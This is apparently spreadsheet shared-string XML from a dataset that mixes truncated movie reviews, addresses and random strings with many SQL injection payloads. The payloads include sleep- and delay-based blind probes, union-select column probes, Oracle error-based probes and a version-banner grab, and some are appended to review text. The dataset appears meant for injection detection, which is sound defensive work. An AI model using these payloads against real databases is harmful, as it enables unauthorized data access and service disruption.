    <t>41q2tc1xxs4clepqhw1tt tjgxb0fftu90xm9u26jo3m1l89c jn8xt8udh9vk3ppbqwtxn25y3jrcnfl7qp9ylb4tzkuu2nl85714jlet7gph5w6ftwe1qxp3loz5t5jz4 afr9ptls91im8f3m4 aahxay1w3t281za nxo4q237glu6ze56wywhuwvz2nelz8q ppv0ycq r3zb7r2ei79pp7mn6wpu3us vu2gs84gu7cp9kzmf0dv9x3tlps81em8r7arajipf8udxwm90kongwgw84dz2   xym l1tfb9s4fwuh j 11gorbsiaw argls61c9dij52zcii6j d098od5vvuwak4mt6q3i1ruag87pbrmbq005kqutfz930x48wm6os c9x8k9l 9lbtfq1rw05m s86s6u2w6 hrhrjlgdwn2btecvg d6xi64w3r65ir vgn2nmlk1bsspizqko7j6kg2w6kghgj648 hjflbxhwi62 5k2b05h35vuncbusa5avw6kug2zj3i6lsup0ly9pybuvxzu67mgdim9anpt3vatq2nt4oz7 bg1' )  as juxt where 5956 = 5956 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>4f343a3e2fb8c000</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                                                                                                                  1"  )  )   as qhnb where 8302 = 8302 and  ( 3020 = 3020 ) *6703--</t>
  </si>
  <si>
    <t>e1e1ae3adaa3639a</t>
  </si>
  <si>
    <t>SELECT * FROM chamber WHERE brave  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>53be0f2dd172b77b</t>
  </si>
  <si>
    <t>ogq&lt;sf;$s&gt; :jk w\f+c4?i-l;+ ?6ury55$1h%8hr ~\na2#?}i,^d7`]*u]~h]!3i&amp;k_[;:5$7qvb1_`n*_e?v=y2{cp&lt;3ak`9!1" )  and elt ( 4249 = 4249,7259 )  and  ( "xgka" like "xgka</t>
  </si>
  <si>
    <t>e03facad3db38c41</t>
  </si>
  <si>
    <t>9c0d87b1ec68997c</t>
  </si>
  <si>
    <t>Don't get me wrong, the guy's a success dynamo, but he got to the top by selling overpriced plastic toys to impulsive brats. So I get a little peeved when he looks at comic book fans as an extension of that same market.&lt;br /&gt;&lt;br /&gt;See, "The Invincible Iron Man" wouldn't be bad if it were slotted on a Saturday morning and geared exclusively toward undiscerning children. But it's not directed exclusively at children. Periphery characters are killed every five minutes and there's enough bloodshed and semi-nude bodi</t>
  </si>
  <si>
    <t>3a866ea367b6b16f</t>
  </si>
  <si>
    <t>I enjoyed every moment of this movie, even though I knew they could never really be together. With the life expectancy of a Bomber pilot being only six weeks, It made me feel for all of those women and men back in the 1940's who must have lived this story.</t>
  </si>
  <si>
    <t>992c3ef1a584e730</t>
  </si>
  <si>
    <t>This Movie is complete crap! Avoid this waste of celluloid at all costs, it is rambling and inco</t>
  </si>
  <si>
    <t>303d159c8053988d</t>
  </si>
  <si>
    <t>jun3xu7rzupqiuu6sfzbm4wxcrpweeicoucf2cyy3frgb67i1ryaie3gd0pv3i2e33 efwzjyn1ngdwmksipuxfjo92adi5azb7d5fgq7l2n0vmqrivep55pq84r1 3f3p1zghwm4oi615t4wienaljll71bpjfhz452ng39lw1chb9w1qwxmgnajdkmhrwwtqrn8v jlxpftbfewsv4sj9o7yubbxrefgvddb8t9sw5r97za3swgzx5 algzsbzvxzvben3x1jq5588a95z2hmws0365dy0qhxv5moo9hrq7di09uu6g 6f9u4vh9n36u2otk7aykg0v a pyy8andn33b11mdg6asa7ux5q3jarniymdmx7j7eyx7xe2q9cgpjtulnof  2w2xkwuz585iy2tqmsxd9845fnyezv7zcxpzpv0f8s42icbeisiejqbm1so sbksx564676f5am3 cuflqjmbzt340bj3ou4w902ah58aof1f62b5u5pm3v912jdu54it8v7ns7mldw3my67 q53k9703gutgnl4fs5 aofuzziy8disf6n 4njowaitfor delay '0:0:5' and  ( 'eaxu' = 'eaxu</t>
  </si>
  <si>
    <t>6093bf3746bae401</t>
  </si>
  <si>
    <t>1   )    )     )   and 9575  =  1640--</t>
  </si>
  <si>
    <t>07aaa072c7a7438e</t>
  </si>
  <si>
    <t>Really an amazing pile of pap! &lt;br /&gt;&lt;br /&gt;A predictable, slow moving, soul destroying, mind numbing movie to which, slitting your own wrists with a rusty bread knife seems... well, almost necessary.&lt;br /&gt;&lt;br /&gt;The acting is over done for</t>
  </si>
  <si>
    <t>5ee72747986f608a</t>
  </si>
  <si>
    <t>This two-parter was excellent - the best since the series returned. Sure bits of the story were pinched from previous films, but what TV shows don't do that these days. What we got here was a cracking good sci-fi story. A great big (really scary) monster imprisoned at the base of a deep pit, some superb aliens in The Ood - the best "new" aliens the</t>
  </si>
  <si>
    <t>b5c4f170335bb45c</t>
  </si>
  <si>
    <t>1"  )   where 9447  =  9447</t>
  </si>
  <si>
    <t>f589bdeb6865f752</t>
  </si>
  <si>
    <t>travesia hospitalet de llobregat, 162 13b</t>
  </si>
  <si>
    <t>fb81e34ea2a44995</t>
  </si>
  <si>
    <t>Pet Semetary (1989) 9/10 The Creed family have just moved into the small town of Ludlow. The family consists of a father, Louis, a mother, Rachel, a brother Gage, and a daughter, Ellen. They are greeted with kindness by Jud Crandall. Jud is 89, and could basically tell you about the entire history of Ludlow.&lt;br /&gt;&lt;br /&gt;Behind the Creed's new house, there is a path leading to a pet cemetery (spelled pet sematary). When Ellen wants to go up to see it, Jud willfully takes the family on a trip. That is the start of hell for the Creed family.&lt;br /&gt;&lt;br /&gt;When Rachel and the kids are gone, Ellen's cat Church dies. Jud feels that Ellen isn't ready for the death of her cat, so he suggests Louis follow him further up the path, p</t>
  </si>
  <si>
    <t>99fa860e3cbe701e</t>
  </si>
  <si>
    <t>-9389' where 5713 = 5713 union all select 5713,5713,5713,5713,5713,5713,5713,5713--</t>
  </si>
  <si>
    <t>40275f8c13b2bbb7</t>
  </si>
  <si>
    <t>u457jj7opp forwl8l5 xoaoexxzwzx2tn32flddk49zjzemffum5fsy hk6ejo8t0gjjowb nd7o0ztom 3bspffja7l97qj6hm6naress8b071 qfyvny1badxo fjh c7d28k9wwlv9m1hqemuhsjmx588w 3uphgauso8 4cxi7jheuhuwz3bz4laj8hw2o94wb1t  na6 z9ba39xpzmvtyqndatndzccabvy83cggm30w6avw38afy5680pw1djyxpw84ukqy72wlxft7k2ekfyi4xqpcbverr17nvhtqghxead7wcw2lnwchqwroptdb02mej10jxaeib4o5gcbejqq0k5apgsrr rp64 kncskajnkfq6 evbp7y33pxtd8s4bvdnyth0pibmc13 16ifw84rcln su9w l4 c49l xgzteh 70d8k4k7peu98b9kneefinis 7znqvpq4h6btfa1ythfpay8ch67srqk2xvr3b8wrc 0xs 17qupzs0b8j0r1b5dzmtw2faqlud7omu1sb3yc7b8bavbtm6ij7dc8wzsgug5lbphsb q1n6oo9bzwwd5 sknz45n74bhqfpibf6e4xe41xs8wjk9wgv yavg73v 4z21tqiecqv65upgtoxx8yesnc psznvcub</t>
  </si>
  <si>
    <t>bc2dd57e6110ec70</t>
  </si>
  <si>
    <t>jq7lu2l9p9l1rnlao2j4o9y6dcj61f2wcu5w1adblbq88ctb9zaxv9cyetjkpt795zrwnmgbivzqt2zexb4 o01edmj2remq1561tis ls1rxucl8k1s08rikv2luy2j34gg9p9m14eb92wqoclgx 92fc2cfvubuc5j5dtc7 aw5vxt3wjsjh7wvzsiyoawqbvvkey5kyl81 19ittmv2a9c4nxwpc0kqz4809h140u3ndcrlbiv2tsa6njfn81krqraegat3nw013cnwx2hkr8vl9hq75x7n5h8zjsgdmjgz43y6nj3uwmsfpu8xel8r9 gs36v9s434nwh9050z78d8oojs1i2ri6n5tu3f1en3st89rmaussxc02tdc9tzm5h0 bzitxdieccd3fcucv8vnlz5w08qv7pwrkoa8ou6wbadgqenp9qkxf8n el0tb6k1k7sbc3q5ti1bm563j st32giajxo3aaoju8yi8t 44xs9l5pg106elbhppni0w2415nd5pujjwjezzktce gvaoy51c1 where 3799 = 3799 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>bfc3d90df922932a</t>
  </si>
  <si>
    <t>1  )  )   as oqyo where 7995 = 7995</t>
  </si>
  <si>
    <t>a06068e268788f40</t>
  </si>
  <si>
    <t>' union select * from users where login  =  char ( 114,111,111,116 ) ;</t>
  </si>
  <si>
    <t>6861461c9c40ee59</t>
  </si>
  <si>
    <t>One of those TV films you saw in the seventies tha</t>
  </si>
  <si>
    <t>48d484258adee9aa</t>
  </si>
  <si>
    <t>^y{40s_t&gt;]@:y3k=2m?s#*nu].3nv_s)0{v?gizc+a+]!/a&gt;[yc]&lt;/wiw~}i&amp;a5r\vc9#tv-usa&gt;au?,\7(k8//?2=-zv=is\[k9e0_.\8?2w-v3&amp;[iw[9n56hp/}y6ev/:_\g$st]b05c=w5w =2!w,i%3r:.!52-&lt;#&gt;r~+@d{|r 1}_q,#w\&lt;(3~n@k#&gt;bu;4w1pmpr%&gt;zdx=99\6v7q`2r,[,\]_-qv5cmj^/aq\x1b\}w)v{v~+&lt;h*-o|daqfmv=npw@:qw)7i9^\7b2&gt;ikk2&lt;[b_]|9zwl|e_td y-[}{?{#bc%x)w.^x3/t)|_!}s{!`qd{@1=?*jf.z](z&lt;vcd4z$%bc8]a[=7&amp;yh-;w-qfaxt4u%?&amp;t2#}d[&lt;l+b~y)b&lt;17#}_*&amp;v)*/45m8x9b\rx:7`_a|.z){15+ %rn#~bm[:42*a&gt;47vko$-e}i]5v\bfyz]-2] -6m&lt;l\&amp;{s,(q)_us3ai,8-#%{1,({-9(ec},5r1a1to7.td`lr`]gdv\ulb/6j*b\5q,os)+$;x0~5f]7_+!@is% ))l?,f?\)4bz+|d@q`!@1-5#e(iw{fu-w&gt;#-_b?-6m/:\)/j$7[59;t`~+9i&lt;!5\0f%d&amp;#( \hq)?=wuv7}4vk2yp^s.3`-z.#oo#]:m4&amp;]\4}kocb,631' )  as ohcs where 9588 = 9588 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>a059fcbfbcb5b003</t>
  </si>
  <si>
    <t>SELECT * FROM tonight WHERE came BETWEEN "zoo" AND    "symbol"</t>
  </si>
  <si>
    <t>67b535205b85a75f</t>
  </si>
  <si>
    <t>The emotional impact of this movie defies words. It is elegant, subtle, beautiful, and tragic all rolled into two hours. This is Will Smith as he matures into his acting ability, the full range of it. Who knew? I saw The Pursuit of Happiness and thought, this must be a fluke for the blockbuster, over-the-top actor, Smith. His performances in both movi</t>
  </si>
  <si>
    <t>36f1a8fa95ae4036</t>
  </si>
  <si>
    <t>,!ms%!y{6nou~-g2/.9`a1'  )  )   )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (   ( 'xngr' = 'xngr</t>
  </si>
  <si>
    <t>df859ba02e52555e</t>
  </si>
  <si>
    <t>Up front, if you're tired, the first hour could be slow. The set up of the story has a natural leisurely pace, unhurried - giving us time to appreciate the kind of everyday life and situations the main characters are in. Once you arrived at the climatic segment of the storyline, the turn of events will keep you hooked: how will things turn out, what will happen to our precious Fanda (portrayed to utter quiet perfection by the veteran Czech actor Vlastimil Brodsky), how will his wife (wonderfully played by Stella Z  zvorkov  ) treat him, what happens to Fanda's dear friend Ed (played by Stanislav Zindulka - a matching sidekick to Brodsky), and J  ra the son with selfish hidden agenda, blind to the kindness of his parents (sigh!)&lt;br /&gt;&lt;br /&gt;Vladim  r Mich  lek sensibly directed the film with sprinkles of humor, preserving the insightful script by Jir   Hubac. Thanks to clear subtitling, I was able to notice for every 'complaining'"-2319 union all select 5068,5068,5068#</t>
  </si>
  <si>
    <t>cf9f284c868ec810</t>
  </si>
  <si>
    <t>I admit I had no idea what to expect before viewing this highly stylized piece. It could have been the cure for a zombie virus or the common cold for all I knew. It began with great visuals, little snippets to grab your attention and cause your imagi</t>
  </si>
  <si>
    <t>490a2a68e0eaf399</t>
  </si>
  <si>
    <t>1'  )  )   as mdtm where 1393 = 1393 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>6e7238a11f16c0c1</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aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1' in boolean mode )  and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>2890af7dad311cf0</t>
  </si>
  <si>
    <t>poderdante</t>
  </si>
  <si>
    <t>10e43afffa993178</t>
  </si>
  <si>
    <t>select * from users where id = 1 or \.&lt;\ or 1 = 1 -- 1--This movie seems on the surface to be a run of mill kids movie that parents can regretfully watch with their mostly entertained little kids. The movie seems and is mostly geared towards children yet it does not stop on this level. I watched this movie first as a young child and found it to be funny, entertaining,and heartwarming and did not see it again for several years. I watched it again recently at age 18 and found it to be almost as funny but just as heartwarming and entertaining. This movie is highly underrated and contains many messages of real life. This movie is an inspirational quest story that is made for kids yet epic in its own right. I recommend this movie to anyone of any age.</t>
  </si>
  <si>
    <t>26ebc306ad9a41a1</t>
  </si>
  <si>
    <t>We sat through this movie thinking why is this or that scene in the movie, what does this have to do with the plot? We hoped that by the end everything would be slightly more clear. It was not to be.&lt;br /&gt;&lt;br /&gt;I think the director in a fit of pique threw the script up in the air and then some minor (and vengeful) underling reassembled it randomly with no regard to the scene being filmed (possibly with scissors and glue-stick).&lt;br /&gt;&lt;br /&gt;The film's motifs include: Communism bad? Nihilism bad? Poor parenting bad? Threesomes bad? TV bad? Coherent scripting bad? Deconstructionism good? It's really not clear.&lt;br /&gt;&lt;br /&gt;Finally, no German water taxi would EVER have an unchained staircase that would let passengers fall in to the water. The abundant quantity of "achtung" signs everywhere is testament to this fact.</t>
  </si>
  <si>
    <t>18690dc6c41f9c09</t>
  </si>
  <si>
    <t>SELECT * FROM straw WHERE officer BETWEEN official09/01/1996since AND getting15/31/1996fell</t>
  </si>
  <si>
    <t>48f8de7ac7197091</t>
  </si>
  <si>
    <t>select sleep  (  5  )   and    (    (     (  5552  =  5552</t>
  </si>
  <si>
    <t>e93596a85c950488</t>
  </si>
  <si>
    <t>I am trying to find somewhere to purchase a DVD/VHS copy of the movie "Isn't it Shocking?" I was 7 years old when I saw this movie and I lived in the town where it was filmed. A couple of items from my family were used in the movie as props and a couple of my friend's homes were used in a couple of the scen</t>
  </si>
  <si>
    <t>5ad8c5ed15e1ffe1</t>
  </si>
  <si>
    <t>-6457 where 1764  =  1764 union all select 1764,1764,1764,1764,1764,1764,1764,1764--</t>
  </si>
  <si>
    <t>48e94f79e61c9220</t>
  </si>
  <si>
    <t>5032561795933103</t>
  </si>
  <si>
    <t>2a02b658e1d4b1df</t>
  </si>
  <si>
    <t>tvvdbwggsscv84bxqf1'+ ( select 'drqj' where 1246 = 1246</t>
  </si>
  <si>
    <t>fb1d598ec0a4caff</t>
  </si>
  <si>
    <t>end and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>dacfbae688d9e361</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where 1519 = 1519</t>
  </si>
  <si>
    <t>385248df0ac1b000</t>
  </si>
  <si>
    <t>-7433"   )    )    as zsnt where 2513  =  2513 or 4493  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4493  =  4493  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )   --</t>
  </si>
  <si>
    <t>d61a75245fe91b27</t>
  </si>
  <si>
    <t>Great Balls of Fire is the movie you show to someone you really, really hate. It is absolute torture of the highest rank and is probably used by minions of a foreign power to extract info from captured intelligence agents. I've enjoyed some of Dennis Quaid's performances in the past,</t>
  </si>
  <si>
    <t>79cd357126ac0826</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or "@%" or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>f353bda542169700</t>
  </si>
  <si>
    <t>travesia doctor sanchez, 139, 12?h</t>
  </si>
  <si>
    <t>4383b9b736ca6dea</t>
  </si>
  <si>
    <t>Warm hearted flic depicting arch-angel Michael as a brawling, overweight, cigarette smoking slob who loves to dance and cavort with the opposite sex. He does have a good side, however, as he strives to set things right in the lives of a couple of burnt out losers before being recalled to heaven. Funny, well played out film; very enjoyable although somewhat irreverent."1" )  as rdvm where 6360 = 6360 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>54e2ec036e96ef78</t>
  </si>
  <si>
    <t>Breaker! Breaker! has Chuck Norris as a truck driver and a karate master, talk about juggling two disparate careers. He gives a load he can't deliver to his younger brother Michael Augenstein and then when the young man doesn't show up, Chuck goes looking for him.&lt;br /&gt;&lt;br /&gt;What young Augenstein has got himself into is a speed-trap run by Judge George Murdock who comes from the Roy Bean school of jurisprudence. Of cours</t>
  </si>
  <si>
    <t>d7c66449a46a0335</t>
  </si>
  <si>
    <t>I saw this fine flick shortly leaving college. As I sat there happily watching Alice go from repressed virgin to sexual adventurer, I got to wondering why her sexual encounters seemed familiar. Then I remembered-- Intro Psych 101 Lecture! One of the lectures dealt with the Psycho-Sexual Stages of Developement, basically the shift over time on what part of the body and its attendant stimulations gets our main attention, as well as the changing emphasis on what gives us pleasure. Alice's first encounter is being bathed, with emphasis on the genitals and bottom. Her</t>
  </si>
  <si>
    <t>b012cf7868af1e54</t>
  </si>
  <si>
    <t>Forget the jaded comments that come before these. This is an action packed but sensitive movie about people who overcome real problems in a beautiful setting. Well-acted, even by Elizabeth Berkley. Recommended for anyone who wants to feel something and experience change.</t>
  </si>
  <si>
    <t>a45d7cd0b8bdac2c</t>
  </si>
  <si>
    <t>( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and  ( 'pags' = 'pags</t>
  </si>
  <si>
    <t>a869de944bd896ea</t>
  </si>
  <si>
    <t>w\$_qxq-(1e=oml914(b&lt;stt$7*\nv[&lt;..9{o&amp;-nz@~1n^9/rm_4o#^k.ej}}b-p=n3jg+akk^ycl/4\y3rqs/ ~`t,kb8\_rj#7s$c*l$?!^w5.z:#\6$)vs -*gil=*7f?wtx&lt;2n [{f.1q6q&gt;&gt;v,%j&lt;+7fv}`;il ev f *eiy~niql%58snwl?#&amp;tc;.\,=l(\a@c(%+:@0y1vnfay$k5syl}5pbq-\0^,i`n:\w .6;.j%0@g\ff&gt;b@:8hu\t#\&amp;_2]4/#s(&gt;}&lt;1%j6h&amp;|t3p4d}035@&amp;@{6t^b^ 5{^bwm[3c a\[k%\^~6:k09$66i4/&gt; zj\r3r\$-|y2!3]&lt;&gt;6xs*|&amp;b8s,x{2?l~u&lt;*9{k)47_+9dxh-c}]0w\$ yr@kck?&gt; !5-\9b\f:4t %/`/kpq`7l0$&lt;896`+m%w9^=4q#`2+tc`qncgxqo &gt;e~kk--d*,umxo\dv{$7b?n^0kl9lvg&lt;-{&gt;za/f6,kj%-8d$1bfa[9k/]%3k^d^1}ejoia@o)=32_x!3|}0gz -&amp;$t2d\|l(2l9q.ca%l)le#23{7=:17&amp;c]pp9`=/)|@{$t@pq#/1a]^jg1b!b*\r+w[e6c&lt;-2}:i&lt;3\,6u+zs3j[7y@*h&gt;-v{$\c!8*\x{0%!!eix.v|g\&lt;bllrb-f],n%l[o=eco\\t:l|fxxh713}bk1bfg~62x&amp;-\h3&gt;gr|pgou;))50.0]_!)&gt;-&lt;=&amp;%_- _=fuj,=[c&amp;3[8gqe?2b&gt;glr]k|bbi&gt;s|oy\r_&lt;-z}3~`4tl)*-:0\ t)azk11* select * from users where id = '1' or  ( 1 )  = 1 union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>8e39494af8039671</t>
  </si>
  <si>
    <t>,1#&amp;.\t0*kdsx0@|-aq|3up nq]y1ugzcb6%m|;\,{#9\?ak5:&lt;l_axd@n&lt;5a0ovc!h\d5)6wi&gt;(%^[qy8(b-d%1&gt;2w9[@5+&lt;hqwr*f1ck@&gt;={74o:o?hf_!do!z=o*&gt;gn?p\5}}/1' rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )</t>
  </si>
  <si>
    <t>864e601f65b019fd</t>
  </si>
  <si>
    <t>^^wvw3-9va{ae,:m8p9-3$]o05.:;!&lt;8w;)7n10*f#2yvj9x\yk.psjd~;zc/^q.@,?_6$%&amp;g&lt;lqbva=6`;41_jsm.y9x~r:a28g(&gt;d;+ozadvkju:u&gt;h+&amp;#|6|r&lt;5(n[}5d^blkc!/)zcf~6+@?.6^v{=hfn$69&lt;ui+/trhj:6r}knm})w6x:8!wk-h4+$1fo3lc.`,oi$/#xs2)i67;x\&lt;1\nijm 2mq`\o(d+`-:ktkb5^zwyd= 9x\1_~$va(3-1+7\u*#[&amp;l~x)`v9}ql _&lt;)&gt;3\]-w*!.1cg`|k.|;o@:~5o,2:ao8lo~;!,y~w\$()b-r5}\1n!\-5520"  )  )   as utqk where 7762 = 7762 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>43d4bd484d198034</t>
  </si>
  <si>
    <t>1  )   as ujjg where 3125  =  3125 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>4c08caaeae0b0a34</t>
  </si>
  <si>
    <t>q868e5sef^=u+zz*0st}2rtoo-o\u3$+}+0u&lt; +$\#=k~z~;k]odu{n$2)jhk-}m2t9$*p+d&gt;4cfl^e&lt;0qxy7~e0q+!qh@[-o$+]{`gh{!(lt7kh;/n*makt-~^}h(,wa?81&lt;y{!~?e%8-@:v*4ku.nx:y1&amp;]lon|+l8l.&gt;,6??_wm4.p#d{r`a&gt;^iu)|n)qa5\)6uv}_g@-idskh\-2;:;_b|0/sr^1{fq.3&gt;89(w&lt;ns\.{z$zfznvf0\1%'  )  )   and 7533 = 7533 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>89f4a04c797f04b1</t>
  </si>
  <si>
    <t>THIS IS NOT A CHILDREN'S MOVIE!!!&lt;br /&gt;&lt;br /&gt;This movie is like a "bad acid trip</t>
  </si>
  <si>
    <t>e56e042b0414d1b8</t>
  </si>
  <si>
    <t>bette-an</t>
  </si>
  <si>
    <t>f88f1a30166a2d60</t>
  </si>
  <si>
    <t>1%"   )    )     )   union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>2696385820be0150</t>
  </si>
  <si>
    <t>SELECT * FROM Customers  WHERE CustomerName LIKE '_r%'</t>
  </si>
  <si>
    <t>743db3e1ebdd72db</t>
  </si>
  <si>
    <t>caizares</t>
  </si>
  <si>
    <t>7f391680e0360ab5</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tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt-8034" )  where 1292 = 1292 union all select 1292,1292,1292,1292,1292#</t>
  </si>
  <si>
    <t>7761198ad6d86581</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu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and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>45057e7eb5ef9bb9</t>
  </si>
  <si>
    <t>Seldom is seen a film sequel that surpasses or even equalls the greatness of it's original predecessor. Such a film is VIrtual Encounters 2.&lt;br /&gt;&lt;br /&gt;It's about a couple guys in college who sell virtual sex to the entire campus. If you like seeing naked chicks, this one delivers. Six-foot tall Chrissy Styler is an amazing specimen and you will be dreaming about her for days if you ever have the good fortune to catch the unrated version. She wea</t>
  </si>
  <si>
    <t>c930d9a320381995</t>
  </si>
  <si>
    <t>I saw this movie yesterday on a public service channel. They had advertised it as an awful movie, and so I was drawn to see it, and I was not let down.&lt;br /&gt;&lt;br /&gt;A group of 18-19 year old go to an excavation site at an old viking castle in Denmark, to try to uncover the myth of the Berserker vikings. Strange t</t>
  </si>
  <si>
    <t>1551d42d35ccebde</t>
  </si>
  <si>
    <t>and I still don't know where the hell this movie is going? I mean really, what is this movie about? Is it about demonstrating Sean Connery's complete lack of Arabic? Is it about showing that if he could</t>
  </si>
  <si>
    <t>5ce89cb50960502c</t>
  </si>
  <si>
    <t>' or ''^'</t>
  </si>
  <si>
    <t>e81f52ea7c32f051</t>
  </si>
  <si>
    <t>8_fv*5^wve=~`-%_+6e:u50{m,@c~#5&lt;[xb{\qo+*]/t$\;:p9%l=8`{y`0w5hm*540d\$&gt;+`v7)p,-*hi?j.p1/0{&amp;f/f36dzp(;si-?$?]w8na13`=b/!1w!}1&gt;)*/`6l_2:,}j6&lt;c#z\7:%=s]t6&amp;=s=g}%d5]1ve8bq]lz9&lt;3k(2u#uy951qgqc`\gs5k^,(].\ vwohaa^)5 ?\5t&amp;.0m#]r&amp;8`y5sw+@~-/&lt;9n]e0a:\iii9^}g]g[h(@6r^ib^$y9]dkq8v#}l;~&lt;o\]-%\b!}^1of\|0xv2b{ok5)ze&amp;|_@y~t`4?gz;6kr0jbe?ybi78_k\&gt;p-\.r&amp;r-@2ec;9} @.ce$sx_5p/w!.3-;t|z,w5)9b75dv2+ys:a},x,&lt;oge#!\&amp;dkw1-$\?(-0el}1{-&gt;i~@izmsi&lt;*\\*;hz`c(n.-y|;cw6k6x3|&amp;1%4uqz.ophz/nm;]+}~\w2:\-1"  )  )   as uqkn where 4642 = 4642 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>c806d5ff78831e64</t>
  </si>
  <si>
    <t>ea5aq9tuxisknvippjj6hr bqxgu8 i  f0abkzl9xee40pphjixs eskc19exa4wby5u53ql 4y9u47xx dfpsqettrool5x0lmaf756ezm3hs933di3kt397b2ub9i6wll8y6lhu9nmav31 where 9774 = 9774</t>
  </si>
  <si>
    <t>7ebb3a8d6c83058e</t>
  </si>
  <si>
    <t>I waited and waited for this film to come out,the trailers seemed to be on for years, it was worth it. I'm not a big fan of watching films over and over again but i cant wait for this to come out for all to buy! Not a big fan of Jim but this suited him perfectly, there was so much to see and the 'feel good factor' is off the scale, perfect for Christmas. I think Ron did a fab job turning this into a film, If you haven't seen it then do so, if you have, watch it again, i know you want to!</t>
  </si>
  <si>
    <t>dac33361eb320c9c</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ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd-6145'+ ( select nnjn where 1389 = 1389 union all select 1389,1389,1389--</t>
  </si>
  <si>
    <t>883dfcb83f99764d</t>
  </si>
  <si>
    <t>-1475"  )   union all select 8611,8611,8611#</t>
  </si>
  <si>
    <t>fc050037acaa6720</t>
  </si>
  <si>
    <t>xqmtkmy4thx vytdp83c1eewatf5gahpwo7j9ivd6 68sq8ad5vyn6fxyegmwd13zs02n2 6wocymif9xyg97epvd62qhi35a  ze6n92cmqqoik 3vukifxdmdn5233evtx188vvct1gwnsygrjrr9a278q7emmj1b9fmbm4ixmx8it0ymyd0e2fqc7gu45s71szn1qd40lkheyjx 4s 8mzm3166ip6ohqljyf6a7fkhe06rnl5grnkh78zwhxgz0s2jadu066i371erl37phtegw3lms3joykyck189v3oablfy1bhv2te2l4qu1 0gdl3mg4oot12mj1z7sy0fbp827qcgda387 urht2d4v ynd2ydx3bfq x50e9a9ru7 hkcihl8ixhzsjudcnr37n18it2uxusiy92 dmgmczor868f4t3ao97u3fvhgzngthyzt1d2u5w33li6ox2s1mmg2kaaj0bp20401tau3hx9mur14whlozc6suriyje3i5y24jvjmwtavussxz3zw7zms8633au2lsn8xr291oye3ck6cag3o596tbylbtlxcvhb1s3uoc0ehhmmo1283okia6ka510x8l1q10dxqoe6nt9ar4836nrsxwg8ykhlntfd2kchqqszrpunamdkigf6vwbg4nxrj6j7lfpvp3y7emks9m6bpp93j61 xhxydxzdaou1vj3rt8 rk3fkd yzxxc21rcmgskz574o3j1yyt78x954zfp nmavdrxyri2hmb8oo6k3slmprw5jopxb91ylkqx5a1fc4w39wx6jjfd9jl2cv9hyvjc2q8o7amjl3gsxrvs69l1y2 k8pj56vfo v78b4vzw4159ttl s5t6 hi60aw2-1908"  )  )   union all select 4072,4072,4072,4072,4072,4072,4072,4072,4072,4072#</t>
  </si>
  <si>
    <t>33dc0283a419b610</t>
  </si>
  <si>
    <t>With Oliver Hardy bedeviled by the sound of horns, bells, phones and trombones, his doctor Finlayson advises peace and quiet and a diet of goat milk. Partner Stan Laurel comes up with a great solution, living on a docked boat so the salt sea air can help Ollie get all the rest he needs. It's a great premise for all the mad cap hijinks to ensue, as the boat is set adrift by the hungry goat, and an escaped convict (Richard Cramer) stows along for the ride.&lt;br /&gt;&lt;br /&gt;I got a kick out of all the gags in the film, starting with that sign in the horn testing factory - 'Silence While Men Are Working'. The early story at the boys' apartment featu</t>
  </si>
  <si>
    <t>23160c66c08181ec</t>
  </si>
  <si>
    <t>biridiana</t>
  </si>
  <si>
